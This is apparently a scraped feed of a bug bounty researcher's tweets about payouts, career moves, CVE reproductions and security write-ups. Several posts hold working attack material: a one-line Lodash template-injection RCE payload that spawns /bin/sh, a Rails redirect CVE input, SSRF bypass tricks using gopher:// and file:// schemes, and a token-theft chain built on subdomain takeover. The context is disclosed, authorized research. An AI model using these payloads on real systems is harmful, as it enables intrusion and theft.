Just got $50k (2*25k) for our RCE. waiting for approval to publish our writeup. cc @iamnoooob
64
40
1,060
Sat down with @iamnoooob and worked on the recent Mobileiron MDM RCE by @orange_8361 and what a great find, Here's an RCE PoC using JNDI Injection via local classloading reference triggered using Hessian deserialization as stated in the blog. github.com/iamnoooob/CVE-Rev…
18
271
797
I bought something with bounty 😍
56
8
768
Exploited Lodash SSTI with @iamnoooob via process binding spawn_sync. Here's a tweetable RCE PoC ${x=Object}${w=a=new x}${w.type="pipe"}${w.readable=1}${w.writable=1}${a.file="/bin/sh"}${a.args=["/bin/sh","-c","id"]}${a.stdio=[w,w]}${process.binding("spawn_sync").spawn(a).output}
13
197
646
Here’s our Apple RCE writeup!
I and @rootxharsh found and exploited a 0Day RCE in Apple's Travel Portal and were rewarded with $50K. Here's the write-up for that: github.com/httpvoid/writeups…
13
73
482
After more than two years of hacking on @Vimeo, Am excited to share that am joining them as Application Security Engineer 🤘. Its time to go on the other side!
61
8
459
FYI - this is what the triagers go through on daily basis in mass amounts. oof.
32
25
425
We've been assigned with CVE-2021-41349 for pre-auth Reflected XSS in MS Exchange. Found this with @iamnoooob months back while playing with Proxyshell lol. github.com/httpvoid/CVE-Reve… msrc.microsoft.com/update-gu…
14
90
413
There's a lot of blind following in infosec. Sometimes, fame is valued more than skills.
17
20
408
$30k goal by @bhavukjain1 is completed. Me and @tweetrpersonal9 just got $30k from @PayPalInfoSec at @Hacker0x01
43
22
384
Sat down with @iamnoooob and did this Exiftool (CVE-2021-22204) RCE. Nice one @wcbowling! Now let's try to fit this in a jpeg.
6
51
352
Inspired from all the awesome creators, Here's our try-on video content. Here's the first installment of the Javascript Prototype Pollution series. piped.video/watch?v=J3MIOIqv… by @iamnoooob & me.
13
127
333
Javascript Prototype Pollution Part 2 is up! And I personally think @iamnoooob has done a great job in this video. We walkthrough theoretical concept, a vulnerable application, and further in debug mode of the application😉Subs /Like/RT are appreciated piped.video/yDmOXhr8wmw
11
125
325
Workshop "Demystifying the Server Side" slides presented at Ekoparty, Hackitvity Conf, and NoNameCon 2020 by @h4ckologic @iamnoooob and me. docs.google.com/presentation…
10
114
324
Thank you @Hacker0x01 @Bugcrowd @SynackRedTeam and all the platform/programs I participated in. This would have been never possible without them. The balcony is a mess ATM but would be cool place to hack at soon. All the hard work paid off! :)
41
4
314
Our vulnerability research team at @pdiscoveryio is on streak. Reported three RCE to Apple, one each month, netting $75,000 in bounties. Can we pop again in April? Lets go!
9
9
304
21,530
What a great fucking chain. It's the best SSRF we've done @S1r1u5_ @iamnoooob. Incredible work @S1r1u5_ Lots of learning! Probably a write-up soon.
3
15
295
Finallllyyyy!! From API Docs to not having API Access to blind SSRF to tricky mime type sniffing to secrets/responded SSRF ;)
8
26
269
Joined the team at @pdiscoveryio as a vulnerability researcher alongside @iamnoooob. Excited to work on some challenging stuff ahead!
30
6
260
Who messed up the DNS entries again?
19
11
241
Getting started in Hacking? Checkout github.com/chybeta by @chybeta . Awesome resources altogether categorised. (Translate to English)
2
101
228
Hi fellow bug hunters!! The most valuable $400 I spend every year. @Burp_Suite #bugbounty
4
14
225
Wrote a @pdnuclei template with a slight variation of the public version & made 10k in a day. You can criticize people for not using it in the right manner but the tool in itself when used efficiently & reliably can ez make $$ No one filled dupe to our reports.
6
11
207
My first CVE 😀 RCE in MiniMagick gem Class Image, Method Open, Input i.e. image path or URL to be opened is passed to Kernel.open which allows piped subprocess and hence a scenario where user control this value and if no sanitisation is done this could lead to RCE
CVE-2019-13574 In lib/mini_magick/image.rb in MiniMagick before 4.9.4, a fetched remote image filename could cause remote command execution because Image.open input is directly passed to Kernel#open, which accepts ... vulmon.com/vulnerabilitydeta…
11
27
194
CVE-2023-20864 - VMware Aria Operations for Logs / Log Insight Pre-Authentication RCE PoC. @pdnuclei Template - github.com/projectdiscovery/… cc @iamnoooob @wvuuuuuuuuuuuuu !
6
41
188
29,442
Today was my last day at @pdiscoveryio. This place gave me the opportunity to do what I love: vuln research. I'm genuinely thankful for that. It's been fun hacking with @iamnoooob, and I'm sure he'll keep publishing great blogposts that I'll now be reading from the other side. What's next? I'm taking a leap and going full-time on @HacktronAI, building an autonomous AI security researcher. Hacktron has already found 0days, reversed CVEs, and uncovered some cool bugs. It's going to be a fun and challenging journey, but I'm all in and really excited to build this with @S1r1u5_ and @zeyu2001 .
16
3
192
15,368
Proud to announce I'm joining @ZomatoIN as Security Engineer. Will be moving to Gurgaon/Gurugram soon. Would be awesome to work with you @prateek_0490 .
33
1
183
I discuss a tricky SSRF finding in this post which led to SSRF on Dropbox BBP amongst others. If you enjoy this and other articles in the repo, please consider retweeting and following @httpvoid0x2f for more content.
Hacking Google Drive integrations with a case study involving the use of CRLF and Request Pipelining to perform SSRF. github.com/httpvoid/writeups…
3
39
185
Thread - We get asked about our methodology very often. So I’m gonna try to parse mine in a thread. I don’t think there’s one but lets try. My mindset apart fron making money is, enjoying the hunt & impressing the person on the other side. I’ve made many connections this way.
4
33
178
#bugbounty goal 2018 - $30,000 across both @Hacker0x01 @Bugcrowd - 5k rep at @Hacker0x01 - Start giving more time to @Bugcrowd - Clear OSCP - Atleast 2 valid bugs to each Google, Facebook , Yahoo. Lets hope for the best 😍
16
9
183
And that's the first RCE of 2019 :) Gotta love those blitz. @SynackRedTeam
13
3
175
> Blind ssrf with gopher support. > internal host working on an open source project. > RCE via a header in the open source project. > Time to exploit > Host is not reachable on plain HTTP > Gopher becomes useless > Cries in TLS handshake Pain
5
11
174
Weekends with $20,000 bounty for single bug(my highest) , thanks @PayPalInfoSec
28
8
170
5 triagers can't understand one XSS report. 🤦‍♂️
20
3
168
Felt like shitposting @iamnoooob
2
16
172
Nice little bug of Rails (CVE-2021-22885) github.com/rails/rails/blob/… redirect_to(params[:lol]) /?lol[]=xxxxxx undefined method `xxxxxx_url`
1
33
168
#Mobikiwik data breach, I confirmed the data via the onion portal, this is legit. I've also learned from a few friends that their data has a card in it while their account on Mobikiwik doesn't have any card saved to it. WTH? Nice take there. FYI - @TheHackersNews
11
26
166
I’ll be disclosing a bug with few case studies soon. I was initially thinking to just post a write up as the bug itself is not hard but it is something that opens about type of bugs you should be thinking about. Not sure If I should go for a video with demos or s blogpost.
9
4
167
10K club @Hacker0x01 .. Send some goodies? @0xrudrapratap
5
1
162
"The more you have, the more I will take." - Chrome
11
11
158
PII leak 10k but RCE 3k :( This was a nice ssrf with RCE potential. Yay, I was awarded a $3,000 bounty on @Hacker0x01! hackerone.com/bugdiscloseguy… #TogetherWeHitHarder
11
5
156
Some changes to @Vimeo 's Bug Bounty program: - Full bounty on triage - Your report does not necessarily need to include a full exploit for chained bugs, we might consider them for payout. - No more CVSS! 20% bonus on reports for a limited time More - hackerone.com/vimeo
6
7
155
Some personal news - This is my last week at Vimeo. I've enjoyed my time here. Onwards to new stuff & challenges!
15
1
155
A good week on @Hacker0x01 :)
17
5
154
One more: Find a subdomain such as <grafana>.corp.company.com which points to a external IP example however only accessible inside VPN and such SSRF could be leveraged in that way. You can often find such hosts over SSL. Have exploited such in pasts. Might even be a #bugbountytip
Thoughts: - try specifying the port to see if 80 still responds to SSL traffic - see if you can find validation issues, e.g. https://x<new line>http://localhost - leverage a redirect to downgrade - try redirecting to file://, |ls, or gopher:// - inject headers for cache poisoning
1
26
139
Another year wasted successfully. Nothind done, Nothing achieved.🙂🥲
4
12
146
New Blogpost - We identified a vulnerability in Discourse where a misconfiguration in Rails send_file + Nginx's internal directive can expose database backups! projectdiscovery.io/blog/dis… This issue isn't limited to Discourse. It can affect other Rails + Nginx apps with similar configurations. Read our full analysis and detect it with our Nuclei template, now live on ProjectDiscovery Cloud!
2
36
145
13,324
Nah.. I know it’s a joke but your audience has alot of teenagers/new bies and they might actually think its okay to skip sleep to hack. Which is not okay at all.
12
13
142
First submissions of 2020! ehh looks dupe to me.
4
1
142
Fun & simple to exploit #CVE-2020-1947 Apache ShardingSphere RCE. Another night, Another hack with @iamnoooob!
4
25
135
Completed sky diving✅ With my Indian hackers' buddies! Living that bounty life😍 @princechaddha @AnsariOsama10 @securityidiots @ahm3dsec @armaancrockroax
5
1
135
So inspired by @stokfredrik @NahamSec @zseano 's live streams lately. Thinking to do one myself on Sunday (tomorrow), not sure what will be the topic, can be Q&A like. Should I? any topic suggestion? #BugBounty
12
11
131
New day, New 0day. cc @iamnoooob 🥳
1
2
138
#Thread #Year_2019 I didn't set any goals for 2019 and let myself reign free. I enjoyed it (a lot!) here are a few things I got in 2019. - A full-time job. - Learned, Earned, Traveled. - Moved to my new house & got a new car. Thanks, @Hacker0x01!
2
2
130
I’m gonna fall asleep any moment so, Happy new year everyone! Let’s pwn 2022 together!
5
136
Reproduced Citrix ADC Remote Code Execution #CVE201919781 with @iamnoooob. Good chaining, Learned new stuff exploiting this together!
1
11
127
Working on a video to disclose one of my somewhat cool SSRF from 2019 and a recent Slack bug (disclosure requested). Both revolves around same vector. I’ve procrastinated this for so long lol.
4
1
132
This month so far; 3 - RCE 2 - SSRF (1 potential to RCE) 1 - LFI (Private/public SSH key readable but ssh was working internally, Could allow RCE if there was some uploader) 1 - RXSS :(
9
5
130
> Woke up at 4am > Starts thinking of theory to chain a few lows for a crit. > Theory works > Tweet this before actually writing down the report (SSRF to priv. esc.) > Call it a night?
1
124
Paid $350 to reach an endpoint with XSS only to get blocked by CSP 📉
126
Second RCE of 2019 xD Triaged and rewarded within 3 hrs on saturday. Yay, I was awarded a $2,000 bounty on @Hacker0x01! hackerone.com/bugdiscloseguy… #TogetherWeHitHarder
1
5
124
Visa approved, Flights booked! Definitely up to catch up and discuss some content injections 😁 See ya all in Vegas. #h1702
9
1
120
There are a few RCE/SSRF case studies. If you ever wondered why ..;/ works, check out the reverse proxy section.
1
25
121
Don't take bug bounty as a race or some kind of game. Be calm and patient while your testing hours. Take proper rest when you hit your monthly money/bugs count target or you may suffer from mental issues (experienced).
5
18
112
Need to do a writeup of a trending Indian app (and misslead masses) or I will lose my fame.. dont care if it even makes sense.. just have to do it. ⌨️⌨️⌨️⌨️ lmao xD
15
6
114
This week's SAML blogs are must read - mutations, parser differentials and namespace confusions. great stuff by @ahacker1_h1 @d4d89704243 @garethheyes @ulldma portswigger.net/research/sam… github.blog/security/sign-in… workos.com/blog/samlstorm
1
26
116
7,888
Hmm so, @cobalt_io thinks I'm not capable of their core team. I'd not blame them, I lack the core skillzz :(.
16
2
112
Reported an RCE to a program 10 days back, my webshell is still accessible 🙃
2
1
116
Very excited about this! @iamnoooob @h4ckologic will be giving a workshop about all those cool server-side stuff. :D With some cool case studies 😉 cfp.nonamecon.org/nnc2020/ta…
4
29
113
While reversing these CVE's & reading blogs from Orange, Matthias, Alvaro, Michael (artsploit) and many others in the process I've learned so much but still, I've difficulties understanding lots of technicalities. Could only hope to become better over time.
5
5
114
Will stream @Twitch tomorrow 8PM IST. We will be discussing ssrf/rce. I am not sure if am ready for this but lets do it.
6
13
107
Starting bug bounties after a months-long break is so tough. REEEEEEEEEEEE
5
113
Billion $ corps vs teenagers.
2
6
112
4 years on HackerOne completed this Jan and ~6 Years in Infosec overall. Good journey.
1
1
105
Always wanted to utilise request pipeline in some SSRF chain. Finally did neat one last night. @iamnoooob and I were staring at request why it wont work and then it worked.
4
3
108
We did great guys! @v0sx9b @tabahi_90 @ralamosm @JR0ch17 ... Congrats to @v0sx9b for a 25k bounty 🤘
2
108
I and @iamnoooob reproduced this latest CVE of Moveit (CVE-2023-36934). This is pretty neat finding, props to original finder.
📚 Learn about the MOVEit Transfer SQL Injection vulnerability (CVE-2023-36934) in our latest blog. Plus, we've also released @pdnuclei template to detect and aid quick mitigation. blog.projectdiscovery.io/mov… #MOVEit #Cybersecurity #hackwithautomation
3
16
108
32,039
Unpopular opinion: Before asking a basic concept I think we all agree that one should try to Google it well before asking else Infosec isn't for you, right? This same concept should apply to platform analyst/triagers as well else that role or Infosec in whole isn't for you?
5
4
104
#h1702 Thread : What an amazing event, opens up my eyes to the whole new things the hackers do. Disappointed that I didn't find a single bug got close to some but couldn't complete the chain. But that's what hacking is you try you fail and you keep doing that untill you pop it.
4
104
Here’s a new writeup! I go over attempts trying to find a 0day. It took a few attempts but pwned Apple again and netted total bounties of $40k.
Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k! blog.projectdiscovery.io/hel…
1
19
105
12,661
Did some causal BB after long time with @iamnoooob! An XSS which looked so simple at first took 1.5 hrs to trigger A confirmed path traversal but remained not exploitable for now An XXE on java 1.8 so mehh Still digging down into a clearly visible RCE from last 2-3 hrs 🙃🙃
4
3
106
Forgot to mention this in our post - @naglinagli @codecancare @streaak has been great to collab with and would vouch for them. Here's a fun screenshot of when @iamnoooob and I first scanned our DB against it :). Tip - If you're scanning, Do some basic operations instead of RCE.
@iamnoooob and @rootxharsh are super generous and played this one really well for companies, reversing the patch in ~week since disclosure, publishing first notice with PoC 3 days ago, reporting it to ~50 BBP programs and getting the full writeup out asap before ransom party.
6
20
103
10K 🙌🏼🙌🏼😅😅 Thank you everyone! 🙏🏻
4
106
After a year of hacking on Vimeo i finally found my first server side critical on Vimeo yesterday. Like Brett said stick around your fav target it can take time to pop those crits.
Replying to @stokfredrik
1) Focus less on $ and more on learning. A lot of hackers have 15+ years already. You can ramp up fast, but there is a learning curve 2) Pick a program you love and stick with it for a yr. I popped a 15k rce on a site after a yr of effort. It can take time 3) Persistence is key
5
13
104
#IndependenceDayIndia 🇮🇳 I would truly celebrate when we get independence from the religion,cast based backward mentality. Hope people start seeing each other as humans before anything else. Live long India.
1
9
101
Look who's having a walk on Golden Gate Bridge @Hacker0x01 😁
2
100
Replying to @HusseiN98D
Weird. I'd choose to be at the pub with my mates having some fine whiskey instead of dropping criticals, I could do that any other time. Life is short xD
6
99
Subdomain takeover -> Target have Facebook sign in? -> Client app accepts *.target.com? -> Can control JS Or have a way to read location.hash on sub-domain? -> Extract the token -> Mobile app exchanges facebook access token for target's api access token? -> WIN-WIN
1
29
97